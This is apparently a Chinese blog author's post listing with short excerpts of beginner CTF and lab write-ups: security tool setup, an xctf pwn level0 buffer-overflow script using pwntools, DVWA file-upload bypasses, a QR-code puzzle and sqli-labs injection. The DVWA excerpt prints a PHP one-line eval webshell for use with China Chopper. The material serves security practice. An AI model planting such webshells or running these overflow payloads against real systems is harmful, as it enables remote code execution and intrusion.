![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
drops
你的小粉丝
这个作者很懒,什么都没留下…
展开
-
drops第一天 工具安装
今天新接触了许多软件,还有功能强大的虚拟机。 虚拟机安装了全新的Linux系统 1.nmap nmap可以实现:主机发现,端口扫描,版本侦测,操作系统侦测等功能 2.sqlmap 用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。 3.Burpsuite 用于攻击web应用程序的集成平台,包含了许多工具 利用火狐浏览器的FoxyProxy插件,进行 4.hydra 5.中国菜刀 ...原创 2019-07-19 17:01:55 · 285 阅读 · 2 评论 -
xctf攻防世界pwn level0的断点调试
将level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...原创 2019-07-24 15:17:10 · 803 阅读 · 0 评论 -
xctf攻防世界pwn level0
答主也是个小白,学长告诉我要用脚本,我也不会写,用的别人写好的脚本 from pwn import * p= remote(‘111.198.29.45’,33907) elf=ELF(’./level0’) sysaddr=elf.symbols[‘callsystem’] payload=‘a’*(0x80+8)?+p64(sysaddr) p.recv() p.send(payload) p...原创 2019-07-24 15:40:48 · 1464 阅读 · 0 评论 -
bugku杂项之普通的二维码
题目给了一个zip压缩包,解压后发现是一个二维码 想着二维码可能会有些提示,用手机扫码后得到如下信息 一看这就不是什么正儿八经的flag 果断转换思路 用HxD打开这个图片,查看十六进制 开头如下: 没有什么发现 再看看结尾: 想到了十六进制数转换十进制数 经过初次尝试,128位的十六进制数直接转换肯定有问题 常规思路按每两位数字截一下,再去转换,发现转换成的十进制数还是太小,十进制数对应的ASC...原创 2019-07-19 22:58:53 · 1261 阅读 · 0 评论 -
DVWA文件上传漏洞low
第一关: 注意上图中的红色字体路径 …/表示上一级,这里有两个…/在网址处找到对应的上两级 将hackable/uploads/1.php这个路径替换一下 得到如下网页 打开中国菜刀 进行连接 附件,一句话木马: <?php @eval($_POST['aaa']); ?> ...原创 2019-07-20 15:02:58 · 798 阅读 · 0 评论 -
DVWA文件上传漏洞medium
之前的操作如上一篇 https://blog.csdn.net/qq_43480081/article/details/96591612 到文件上传时,发现了问题 我们来进行抓包 进行修改,查得如下: .html text/html .txt text/plain .gif image/gif .jpg image/jpeg...原创 2019-07-20 15:24:40 · 694 阅读 · 0 评论 -
bugkuCTFweb字符?正则?
这道题打开后是一个网页 找到其中的正则表达式: /key.*key.{4,7}key:/./(.*key)[a-z][[:punct:]]/ 解题 先来基本的知识储备 按照学长的方法,将正则表达式进行拆分 key .* key .{4,7} key: / . / (.*key) [a-z] [[:punct:]] key就是普通的字符 .是除了换行的任意字符,假设就是a *匹配0或多个正则...原创 2019-07-29 20:04:13 · 1437 阅读 · 1 评论 -
sqli-labs-master第一关sql注入
先了解一下数据库 先登录账户,输入密码 之后可以看到N个数据库 打开数据库可以看到N个表 每个表里还有N个字段 除了用sql语句查看,当然也可以用MySQL等直接查看 开始步入正题 sql注入 url处先尝试着输入?id=1; 再尝试?id=2; ...原创 2019-07-25 20:53:49 · 1243 阅读 · 0 评论